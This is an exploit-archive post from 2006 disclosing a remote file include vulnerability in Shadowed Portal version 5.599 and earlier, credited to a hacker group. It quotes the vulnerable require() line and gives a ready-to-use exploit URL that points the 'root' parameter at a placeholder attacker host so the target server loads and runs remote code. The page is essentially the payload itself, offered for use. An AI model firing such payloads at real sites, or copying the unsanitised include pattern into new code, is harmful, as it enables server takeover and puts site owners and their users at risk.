Shadowed Portal <= 5.599 (root) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Shadowed Portal <= 5.599 (root) Remote File Include Vulnerability
# Published : 2006-09-13
# Author : mad_hacker
# Previous Title : Downstat <= 1.8 (art) Remote File Include Vulnerability
# Next Title : TualBLOG 1.0 (icerikno) Remote SQL Injection Vulnerability

====================== C Y B E R - W A R R I O R  T I M 
======================

+Shadowed Portal 5.599 (root) Remote File Include Vulnerability

==============================================================================

+Author: mad_hacker (turkish hacker)

==============================================================================

+Class: Remote

==============================================================================

+Vuln Code: require($root."/footer.php");

==============================================================================,

+Exploit: 
http://www.site.com/[script_path]/bottom.php?root=http://evil_scripts?

==============================================================================

+Thanx: xoron, Leak

====================== C Y B E R - W A R R I O R  T I M 
======================

# www.Syue.com [2006-09-13]